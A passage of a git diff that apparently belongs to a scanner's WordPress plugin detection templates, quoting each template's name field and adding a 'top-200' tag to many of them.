b/technologies/wordpress/wordpress-popup-builder.yaml @@ -1,7 +1,7 @@ id: wordpress-popup-builder info: - name: Popup Builder – Create highly converting, mobile friendly marketing popups. Detection + name: "Popup Builder – Create highly converting, mobile friendly marketing popups. Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-popup-maker.yaml b/technologies/wordpress/wordpress-popup-maker.yaml index 82e41d34e7..1dbb83c32c 100644 --- a/technologies/wordpress/wordpress-popup-maker.yaml +++ b/technologies/wordpress/wordpress-popup-maker.yaml @@ -1,7 +1,7 @@ id: wordpress-popup-maker info: - name: Popup Maker – Popup for opt-ins, lead gen, & more Detection + name: "Popup Maker – Popup for opt-ins, lead gen, & more Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-post-duplicator.yaml b/technologies/wordpress/wordpress-post-duplicator.yaml index bcc8ad9a28..0c3d24f17b 100644 --- a/technologies/wordpress/wordpress-post-duplicator.yaml +++ b/technologies/wordpress/wordpress-post-duplicator.yaml @@ -1,7 +1,7 @@ id: wordpress-post-duplicator info: - name: Post Duplicator Detection + name: "Post Duplicator Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-post-smtp.yaml b/technologies/wordpress/wordpress-post-smtp.yaml index f6632daa7b..f2f81ec229 100644 --- a/technologies/wordpress/wordpress-post-smtp.yaml +++ b/technologies/wordpress/wordpress-post-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-post-smtp info: - name: Post SMTP Mailer/Email Log – Best Mail SMTP For WP Detection + name: "Post SMTP Mailer/Email Log – Best Mail SMTP For WP Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-post-types-order.yaml b/technologies/wordpress/wordpress-post-types-order.yaml index 4934f5c3b9..f4df5a996e 100644 --- a/technologies/wordpress/wordpress-post-types-order.yaml +++ b/technologies/wordpress/wordpress-post-types-order.yaml @@ -1,7 +1,7 @@ id: wordpress-post-types-order info: - name: Post Types Order Detection + name: "Post Types Order Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml b/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml index 5e2fcdf570..5654ede8a4 100644 --- a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml +++ b/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml @@ -1,7 +1,7 @@ id: wordpress-premium-addons-for-elementor info: - name: Premium Addons for Elementor (Blog Post Listing, Mega Menu Builder, WooCommerce Products Grid, Carousel, Free Templates) Detection + name: "Premium Addons for Elementor (Blog Post Listing, Mega Menu Builder, WooCommerce Products Grid, Carousel, Free Templates) Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-pretty-link.yaml b/technologies/wordpress/wordpress-pretty-link.yaml index a026379fd9..4845eb8026 100644 --- a/technologies/wordpress/wordpress-pretty-link.yaml +++ b/technologies/wordpress/wordpress-pretty-link.yaml @@ -1,7 +1,7 @@ id: wordpress-pretty-link info: - name: Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin Detection + name: "Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-really-simple-captcha.yaml b/technologies/wordpress/wordpress-really-simple-captcha.yaml index 0f5d24c628..9f5902739c 100644 --- a/technologies/wordpress/wordpress-really-simple-captcha.yaml +++ b/technologies/wordpress/wordpress-really-simple-captcha.yaml @@ -1,7 +1,7 @@ id: wordpress-really-simple-captcha info: - name: Really Simple CAPTCHA Detection + name: "Really Simple CAPTCHA Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-really-simple-ssl.yaml b/technologies/wordpress/wordpress-really-simple-ssl.yaml index 99270b1932..cefd39582c 100644 --- a/technologies/wordpress/wordpress-really-simple-ssl.yaml +++ b/technologies/wordpress/wordpress-really-simple-ssl.yaml @@ -1,7 +1,7 @@ id: wordpress-really-simple-ssl info: - name: Really Simple SSL Detection + name: "Really Simple SSL Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-redirection.yaml b/technologies/wordpress/wordpress-redirection.yaml index 8676fffc45..eff92ffab6 100644 --- a/technologies/wordpress/wordpress-redirection.yaml +++ b/technologies/wordpress/wordpress-redirection.yaml @@ -1,7 +1,7 @@ id: wordpress-redirection info: - name: Redirection Detection + name: "Redirection Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-redux-framework.yaml b/technologies/wordpress/wordpress-redux-framework.yaml index 5085265e3e..9e3177b6d0 100644 --- a/technologies/wordpress/wordpress-redux-framework.yaml +++ b/technologies/wordpress/wordpress-redux-framework.yaml @@ -1,7 +1,7 @@ id: wordpress-redux-framework info: - name: Gutenberg Template and Pattern Library & Redux Framework Detection + name: "Gutenberg Template and Pattern Library & Redux Framework Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml b/technologies/wordpress/wordpress-regenerate-thumbnails.yaml index 3d743fff7b..78556bd312 100644 --- a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml +++ b/technologies/wordpress/wordpress-regenerate-thumbnails.yaml @@ -1,7 +1,7 @@ id: wordpress-regenerate-thumbnails info: - name: Regenerate Thumbnails Detection + name: "Regenerate Thumbnails Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-safe-svg.yaml b/technologies/wordpress/wordpress-safe-svg.yaml index 95290e9e8c..4f3a1f9317 100644 --- a/technologies/wordpress/wordpress-safe-svg.yaml +++ b/technologies/wordpress/wordpress-safe-svg.yaml @@ -1,7 +1,7 @@ id: wordpress-safe-svg info: - name: Safe SVG Detection + name: "Safe SVG Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-seo-by-rank-math.yaml b/technologies/wordpress/wordpress-seo-by-rank-math.yaml index d3d0c1550b..193bfd32e1 100644 --- a/technologies/wordpress/wordpress-seo-by-rank-math.yaml +++ b/technologies/wordpress/wordpress-seo-by-rank-math.yaml @@ -1,7 +1,7 @@ id: wordpress-seo-by-rank-math info: - name: Rank Math SEO Detection + name: "Rank Math SEO Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-sg-cachepress.yaml b/technologies/wordpress/wordpress-sg-cachepress.yaml index 06a46d9b8c..268111b662 100644 --- a/technologies/wordpress/wordpress-sg-cachepress.yaml +++ b/technologies/wordpress/wordpress-sg-cachepress.yaml @@ -1,7 +1,7 @@ id: wordpress-sg-cachepress info: - name: SiteGround Optimizer Detection + name: "SiteGround Optimizer Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-sg-security.yaml b/technologies/wordpress/wordpress-sg-security.yaml index 936700a0f6..b5a8d979ca 100644 --- a/technologies/wordpress/wordpress-sg-security.yaml +++ b/technologies/wordpress/wordpress-sg-security.yaml @@ -1,7 +1,7 @@ id: wordpress-sg-security info: - name: SiteGround Security Detection + name: "SiteGround Security Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml b/technologies/wordpress/wordpress-shortcodes-ultimate.yaml index f6d758ab3f..8aaf7f03b6 100644 --- a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml +++ b/technologies/wordpress/wordpress-shortcodes-ultimate.yaml @@ -1,7 +1,7 @@ id: wordpress-shortcodes-ultimate info: - name: WordPress Shortcodes Plugin — Shortcodes Ultimate Detection + name: "WordPress Shortcodes Plugin — Shortcodes Ultimate Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml b/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml index c2e12ec1a3..7b846f66ae 100644 --- a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml +++ b/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml @@ -1,7 +1,7 @@ id: wordpress-shortpixel-image-optimiser info: - name: ShortPixel Image Optimizer Detection + name: "ShortPixel Image Optimizer Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-simple-custom-post-order.yaml b/technologies/wordpress/wordpress-simple-custom-post-order.yaml index cc3f2ad97d..64cdb3db3e 100644 --- a/technologies/wordpress/wordpress-simple-custom-post-order.yaml +++ b/technologies/wordpress/wordpress-simple-custom-post-order.yaml @@ -1,7 +1,7 @@ id: wordpress-simple-custom-post-order info: - name: Simple Custom Post Order Detection + name: "Simple Custom Post Order Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-simple-page-ordering.yaml b/technologies/wordpress/wordpress-simple-page-ordering.yaml index 5d5831e9df..5b8e259b8c 100644 --- a/technologies/wordpress/wordpress-simple-page-ordering.yaml +++ b/technologies/wordpress/wordpress-simple-page-ordering.yaml @@ -1,7 +1,7 @@ id: wordpress-simple-page-ordering info: - name: Simple Page Ordering Detection + name: "Simple Page Ordering Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-siteguard.yaml b/technologies/wordpress/wordpress-siteguard.yaml index a6f86c2b23..ba11a93c05 100644 --- a/technologies/wordpress/wordpress-siteguard.yaml +++ b/technologies/wordpress/wordpress-siteguard.yaml @@ -1,7 +1,7 @@ id: wordpress-siteguard info: - name: SiteGuard WP Plugin Detection + name: "SiteGuard WP Plugin Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-siteorigin-panels.yaml b/technologies/wordpress/wordpress-siteorigin-panels.yaml index f115d57a2a..9ea487dc9f 100644 --- a/technologies/wordpress/wordpress-siteorigin-panels.yaml +++ b/technologies/wordpress/wordpress-siteorigin-panels.yaml @@ -1,7 +1,7 @@ id: wordpress-siteorigin-panels info: - name: Page Builder by SiteOrigin Detection + name: "Page Builder by SiteOrigin Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-smart-slider-3.yaml b/technologies/wordpress/wordpress-smart-slider-3.yaml index 3acef1da2e..a657368f41 100644 --- a/technologies/wordpress/wordpress-smart-slider-3.yaml +++ b/technologies/wordpress/wordpress-smart-slider-3.yaml @@ -1,7 +1,7 @@ id: wordpress-smart-slider-3 info: - name: Smart Slider 3 Detection + name: "Smart Slider 3 Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-so-widgets-bundle.yaml b/technologies/wordpress/wordpress-so-widgets-bundle.yaml index 0594d2b9bb..54db8a0414 100644 --- a/technologies/wordpress/wordpress-so-widgets-bundle.yaml +++ b/technologies/wordpress/wordpress-so-widgets-bundle.yaml @@ -1,7 +1,7 @@ id: wordpress-so-widgets-bundle info: - name: SiteOrigin Widgets Bundle Detection + name: "SiteOrigin Widgets Bundle Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml index bf034c8d13..33942e48ca 100644 --- a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml +++ b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml @@ -1,7 +1,7 @@ id: wordpress-ssl-insecure-content-fixer info: - name: SSL Insecure Content Fixer Detection + name: "SSL Insecure Content Fixer Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml index 6f52390832..00d8795fca 100644 --- a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml +++ b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml @@ -1,7 +1,7 @@ id: wordpress-stops-core-theme-and-plugin-updates info: - name: Easy Updates Manager Detection + name: "Easy Updates Manager Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-sucuri-scanner.yaml b/technologies/wordpress/wordpress-sucuri-scanner.yaml index 9ca3e840a8..c49f159ec1 100644 --- a/technologies/wordpress/wordpress-sucuri-scanner.yaml +++ b/technologies/wordpress/wordpress-sucuri-scanner.yaml @@ -1,7 +1,7 @@ id: wordpress-sucuri-scanner info: - name: Sucuri Security – Auditing, Malware Scanner and Security Hardening Detection + name: "Sucuri Security – Auditing, Malware Scanner and Security Hardening Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-svg-support.yaml b/technologies/wordpress/wordpress-svg-support.yaml index c970433a55..e53f13fa3c 100644 --- a/technologies/wordpress/wordpress-svg-support.yaml +++ b/technologies/wordpress/wordpress-svg-support.yaml @@ -1,7 +1,7 @@ id: wordpress-svg-support info: - name: SVG Support Detection + name: "SVG Support Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-table-of-contents-plus.yaml b/technologies/wordpress/wordpress-table-of-contents-plus.yaml index ff1a310722..5cfe5969bc 100644 --- a/technologies/wordpress/wordpress-table-of-contents-plus.yaml +++ b/technologies/wordpress/wordpress-table-of-contents-plus.yaml @@ -1,7 +1,7 @@ id: wordpress-table-of-contents-plus info: - name: Table of Contents Plus Detection + name: "Table of Contents Plus Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-tablepress.yaml b/technologies/wordpress/wordpress-tablepress.yaml index b98a242d8d..26bbee5e02 100644 --- a/technologies/wordpress/wordpress-tablepress.yaml +++ b/technologies/wordpress/wordpress-tablepress.yaml @@ -1,7 +1,7 @@ id: wordpress-tablepress info: - name: TablePress Detection + name: "TablePress Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml b/technologies/wordpress/wordpress-taxonomy-terms-order.yaml index a2e965cb5d..ca90714e65 100644 --- a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml +++ b/technologies/wordpress/wordpress-taxonomy-terms-order.yaml @@ -1,7 +1,7 @@ id: wordpress-taxonomy-terms-order info: - name: Category Order and Taxonomy Terms Order Detection + name: "Category Order and Taxonomy Terms Order Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-the-events-calendar.yaml b/technologies/wordpress/wordpress-the-events-calendar.yaml index 1de778b59a..24a333b33a 100644 --- a/technologies/wordpress/wordpress-the-events-calendar.yaml +++ b/technologies/wordpress/wordpress-the-events-calendar.yaml @@ -1,7 +1,7 @@ id: wordpress-the-events-calendar info: - name: The Events Calendar Detection + name: "The Events Calendar Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-themeisle-companion.yaml b/technologies/wordpress/wordpress-themeisle-companion.yaml index 52645cdb58..53c940db3d 100644 --- a/technologies/wordpress/wordpress-themeisle-companion.yaml +++ b/technologies/wordpress/wordpress-themeisle-companion.yaml @@ -1,7 +1,7 @@ id: wordpress-themeisle-companion info: - name: Orbit Fox by ThemeIsle Detection + name: "Orbit Fox by ThemeIsle Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-tinymce-advanced.yaml b/technologies/wordpress/wordpress-tinymce-advanced.yaml index 49ae80a9f3..e80b06b625 100644 --- a/technologies/wordpress/wordpress-tinymce-advanced.yaml +++ b/technologies/wordpress/wordpress-tinymce-advanced.yaml @@ -1,7 +1,7 @@ id: wordpress-tinymce-advanced info: - name: Advanced Editor Tools (previously TinyMCE Advanced) Detection + name: "Advanced Editor Tools (previously TinyMCE Advanced) Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-translatepress-multilingual.yaml b/technologies/wordpress/wordpress-translatepress-multilingual.yaml index 279212415e..7b249c86f2 100644 --- a/technologies/wordpress/wordpress-translatepress-multilingual.yaml +++ b/technologies/wordpress/wordpress-translatepress-multilingual.yaml @@ -1,7 +1,7 @@ id: wordpress-translatepress-multilingual info: - name: Translate Multilingual sites – TranslatePress Detection + name: "Translate Multilingual sites – TranslatePress Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml index 918aa52f28..134298a337 100644 --- a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml +++ b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml @@ -1,7 +1,7 @@ id: wordpress-ultimate-addons-for-gutenberg info: - name: Spectra – WordPress Gutenberg Blocks Detection + name: "Spectra – WordPress Gutenberg Blocks Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-under-construction-page.yaml b/technologies/wordpress/wordpress-under-construction-page.yaml index aa3a0aa440..fc1297fae7 100644 --- a/technologies/wordpress/wordpress-under-construction-page.yaml +++ b/technologies/wordpress/wordpress-under-construction-page.yaml @@ -1,7 +1,7 @@ id: wordpress-under-construction-page info: - name: Under Construction Detection + name: "Under Construction Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-unyson.yaml b/technologies/wordpress/wordpress-unyson.yaml index 97f34e994f..f348d7422f 100644 --- a/technologies/wordpress/wordpress-unyson.yaml +++ b/technologies/wordpress/wordpress-unyson.yaml @@ -1,7 +1,7 @@ id: wordpress-unyson info: - name: Unyson Detection + name: "Unyson Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-updraftplus.yaml b/technologies/wordpress/wordpress-updraftplus.yaml index fbbf293450..4e800bebaf 100644 --- a/technologies/wordpress/wordpress-updraftplus.yaml +++ b/technologies/wordpress/wordpress-updraftplus.yaml @@ -1,7 +1,7 @@ id: wordpress-updraftplus info: - name: UpdraftPlus WordPress Backup Plugin Detection + name: "UpdraftPlus WordPress Backup Plugin Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-use-any-font.yaml b/technologies/wordpress/wordpress-use-any-font.yaml index 297ffa0284..a8a10d1ad4 100644 --- a/technologies/wordpress/wordpress-use-any-font.yaml +++ b/technologies/wordpress/wordpress-use-any-font.yaml @@ -1,7 +1,7 @@ id: wordpress-use-any-font info: - name: Use Any Font | Custom Font Uploader Detection + name: "Use Any Font | Custom Font Uploader Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-user-role-editor.yaml b/technologies/wordpress/wordpress-user-role-editor.yaml index 772908ba6b..b0d641177c 100644 --- a/technologies/wordpress/wordpress-user-role-editor.yaml +++ b/technologies/wordpress/wordpress-user-role-editor.yaml @@ -1,7 +1,7 @@ id: wordpress-user-role-editor info: - name: User Role Editor Detection + name: "User Role Editor Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml b/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml index 22c389cb75..2b9a20d6cd 100644 --- a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml +++ b/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml @@ -1,7 +1,7 @@ id: wordpress-velvet-blues-update-urls info: - name: Velvet Blues Update URLs Detection + name: "Velvet Blues Update URLs Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-w3-total-cache.yaml b/technologies/wordpress/wordpress-w3-total-cache.yaml index 1d8e755d3d..d8488903d1 100644 --- a/technologies/wordpress/wordpress-w3-total-cache.yaml +++ b/technologies/wordpress/wordpress-w3-total-cache.yaml @@ -1,7 +1,7 @@ id: wordpress-w3-total-cache info: - name: W3 Total Cache Detection + name: "W3 Total Cache Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-widget-importer-exporter.yaml b/technologies/wordpress/wordpress-widget-importer-exporter.yaml index 2ab3f87b98..66459937c0 100644 --- a/technologies/wordpress/wordpress-widget-importer-exporter.yaml +++ b/technologies/wordpress/wordpress-widget-importer-exporter.yaml @@ -1,7 +1,7 @@ id: wordpress-widget-importer-exporter info: - name: Widget Importer & Exporter Detection + name: "Widget Importer & Exporter Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml index 0d452480ca..68b08c99a4 100644 --- a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml +++ b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml @@ -1,7 +1,7 @@ id: wordpress-woo-cart-abandonment-recovery info: - name: WooCommerce Cart Abandonment Recovery Detection + name: "WooCommerce Cart Abandonment Recovery Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml index 7a14f1a963..de8408b377 100644 --- a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml +++ b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml @@ -1,7 +1,7 @@ id: wordpress-woo-checkout-field-editor-pro info: - name: Checkout Field Editor (Checkout Manager) for WooCommerce Detection + name: "Checkout Field Editor (Checkout Manager) for WooCommerce Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-woo-variation-swatches.yaml b/technologies/wordpress/wordpress-woo-variation-swatches.yaml index c2a4624a44..d77b5049bf 100644 --- a/technologies/wordpress/wordpress-woo-variation-swatches.yaml +++ b/technologies/wordpress/wordpress-woo-variation-swatches.yaml @@ -1,7 +1,7 @@ id: wordpress-woo-variation-swatches info: - name: Variation Swatches for WooCommerce Detection + name: "Variation Swatches for WooCommerce Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml index d22910c45c..0e6b904f2e 100644 --- a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml +++ b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-gateway-paypal-express-checkout info: - name: WooCommerce PayPal Checkout Payment Gateway Detection + name: "WooCommerce PayPal Checkout Payment Gateway Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml index e36a1a70c4..31451a426d 100644 --- a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml +++ b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-gateway-stripe info: - name: WooCommerce Stripe Payment Gateway Detection + name: "WooCommerce Stripe Payment Gateway Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-woocommerce-payments.yaml b/technologies/wordpress/wordpress-woocommerce-payments.yaml index cf3598f149..7fc10d1027 100644 --- a/technologies/wordpress/wordpress-woocommerce-payments.yaml +++ b/technologies/wordpress/wordpress-woocommerce-payments.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-payments info: - name: WooCommerce Payments – Fully Integrated Solution Built and Supported by Woo Detection + name: "WooCommerce Payments – Fully Integrated Solution Built and Supported by Woo Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml b/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml index c0ef0f72f6..507ade5967 100644 --- a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml +++ b/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-paypal-payments info: - name: WooCommerce PayPal Payments Detection + name: "WooCommerce PayPal Payments Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml index 432fcad38f..c5929c49d5 100644 --- a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml +++ b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-pdf-invoices-packing-slips info: - name: PDF Invoices & Packing Slips for WooCommerce Detection + name: "PDF Invoices & Packing Slips for WooCommerce Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-woocommerce-services.yaml b/technologies/wordpress/wordpress-woocommerce-services.yaml index c629f28c73..cd8fbe0a72 100644 --- a/technologies/wordpress/wordpress-woocommerce-services.yaml +++ b/technologies/wordpress/wordpress-woocommerce-services.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-services info: - name: WooCommerce Shipping & Tax Detection + name: "WooCommerce Shipping & Tax Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git 